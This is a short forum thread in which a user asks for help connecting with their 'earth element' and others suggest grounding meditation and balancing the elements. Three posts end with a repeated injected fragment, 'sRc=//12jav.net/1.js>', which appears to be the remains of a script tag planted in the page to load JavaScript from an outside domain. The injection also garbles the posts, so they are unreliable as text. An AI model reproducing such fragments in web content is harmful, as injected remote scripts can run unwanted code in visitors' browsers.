trouble with my element

im having trouble connecting to my element seeing as it is earth it is being stubborn. so when i try to somun or meditate it works sometimes but most of the time it decides to give me hedaches. PLEASE help sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

try to meditate outside or in the woods with your hands pressed against the ground to ground yourself and feel the energies of the earth.also, try planting something sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Maybe it's trying to tell you that you are overbalanced in Earth and you need to work with the others as well. We're not just one element.

I agree we're made up of all the elements but perhaps it's possible to have one or more dominant element. I for example identify as as a fire element because I feel it dominant with in, around and through me. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
